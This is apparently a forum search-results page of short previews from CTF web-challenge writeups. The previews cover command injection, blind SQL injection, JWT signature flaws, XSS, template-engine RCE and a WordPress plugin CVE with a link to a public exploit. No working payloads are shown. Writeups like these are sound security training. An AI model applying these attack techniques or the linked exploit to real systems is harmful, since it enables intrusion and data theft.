Search results
-
[/MNT/AIN LIB] [WEB] cyberpunk-weather-app
cyberpunk-weather-app SRC: https://library.m0unt41n.ch/challenges/cyberpunk-weather-app This challenge display weather data and uses an templating engine. During building of a string a command injection vuln was created within the else block.. we can inject python code and therefore obtained...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] dotcom
dotcom SRC: https://library.m0unt41n.ch/challenges/dotcom Solved this chall locally, submitted publicly shared flag. (hope thats fine) Reported chall as broken and fixed it. There is a .NET server and a BOT component, we need to make the bot write the flag into a textArea and somehow exfil...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] sleepy-sql
sleepy-sql SRC: https://library.m0unt41n.ch/challenges/sleepy-sql This challenge is pretty obvious that we have to perform sql inejction, the hard part is exfiltration tho, there is not reflection allowing us too read any data (like the flag). So we have to work with what we got, time. We can...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] legal-complaint-form
legal-complaint-form SRC: https://library.m0unt41n.ch/challenges/legal-complaint-form Okay first of all, i consider myself a PHP pro, but damn i h8 apache... my main stack is using nginx as webserver... This chall requires two main steps. 1. First of all there is a malicious fileupload vuln...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] pollpals
pollpals SRC: https://library.m0unt41n.ch/challenges/pollpals Typical JWT misconfiguration or lets call it completly fucked up flow/logic/implementation. The isAdmin function in auth.js has no signature check for the JWT, it just accept any JWT and extracts its info... const parts =...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] time-share
time-share SRC: https://library.m0unt41n.ch/challenges/time-share Pretty easy beginner challenge wich teaches an important lesson... ^^ The code has a logic flaw... it doesnt check if the user/admin_token is an actual admin token.. within the JWT there is no indication is_admin or anything...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] knowledge-archive
knowledge-archive SRC:https://library.m0unt41n.ch/challenges/knowledge-archive Holy, this one is easy but took some time. I first was a lil sussed out about the AI Reable Data stuff (a hmac using flag as key) and all the file read/writes or even the popen & glob usage... but this was all a red...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] labyrinth
labyrinth SRC: https://library.m0unt41n.ch/challenges/labyrinth This is quiet the easy challenge, with multiple solutions... the most interesting exploitation path is bypassing the admin permission check too the abuse the SQL injection within admin_search. So theres 3 interesting functions...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] centralized-identity
centralized-identity SRC: https://library.m0unt41n.ch/challenges/centralized-identity This challenge consists of multiple steps, our main goal is too obtain the flag via the backend service API. 1. Within our IDP entrypoint.sh we can find credentials to login into our frontend. email...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] blahajs
blahajs SRC: https://library.m0unt41n.ch/challenges/blahajs The only real discoverable functionality in this challenge is the image display via a GET parameter name and endpoint /image. The rest of the challenge is just displaying of said images and its sourceless. Soo i first tried a directory...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] airsmeller
airsmeller SRC: https://library.m0unt41n.ch/challenges/air-smeller This challenge had a bot component and a leave a review component. It was quiet clear the goal was to achieve XSS, but the inputs were sanitized using DomPurify v19.0.0. At first glance i spent a ton of time looking for other...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] flagkeeper
flagkeeper SRC: https://library.m0unt41n.ch/challenges/flagkeeper This challenge required us too access the admin's flag in database. It had a fully fletched API worked out, and the main way too obtain the flag would be to use admin's API token to request /api/flag for the flag. So i skimmed...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] sentry-as-navigation
sentry-as-navigation SRC: https://library.m0unt41n.ch/challenges/sentry-as-navigation This challenge provides a tool too fetch and display certificate information. There is a clear and easy too find vulnerability in the code wich allows to RCE. for entry in san_entries: match =...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] lost-pass
lost-pass SRC: https://library.m0unt41n.ch/challenges/lost-pass This challenges requires us to auth as admin, too obtain the flag within the dashboard page. After skimming the code we can see JWT session tokens, a not visible in frontend registration function and so on. This misslead me to...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] i (unintended solution)
i SRC: https://library.m0unt41n.ch/challenges/i In this challenge we are very obviously able to inject code into a style tag of the page. Our goal is to obtain an admin session/username to make the server display the flag. The challenge includes a bot, which we can control (make him visit...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] office-press
office-press SRC: https://library.m0unt41n.ch/challenges/office-press Basically just a normal wordpress installation with a vulnerable plugin installed. Google: CVE-2023-6553 Exploit Find -> https://github.com/Chocapikk/CVE-2023-6553 When working with wp, wp-scan is a great tool, get an api key...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] mr-template-man
mr-template-man SRC: https://library.m0unt41n.ch/challenges/mr-template-man XSS Injection and RCE via insecure template functionality. OS is wrapped and provided within our templating, which combined with the content XSS results into fully abuseable RCE. @app.route("/", methods=["GET"]) def...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] lottery
lottery SRC: https://library.m0unt41n.ch/challenges/lottery Blind SQL injection @app.route("/", methods=["GET", "POST"]) def index(): has_guessed = False answer_correct = False if request.method == "POST": has_guessed = True guess = request.form.get("guess", "")...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] pawnedhaveibeen
pawnedhaveibeen SRC: https://library.m0unt41n.ch/challenges/pawnedhaveibeen Source is given, the post form has a command injection trough subprocess in py. @app.route('/check', methods=['POST']) def check_pawn(): username_or_email = request.form['username_or_email'] mysql_username =...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] calculator
Calculator SRC: /mnt/ain lib -> https://library.m0unt41n.ch/challenges/calculator Pretty much just a python shell, due too it evalling user input without any sanitization...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups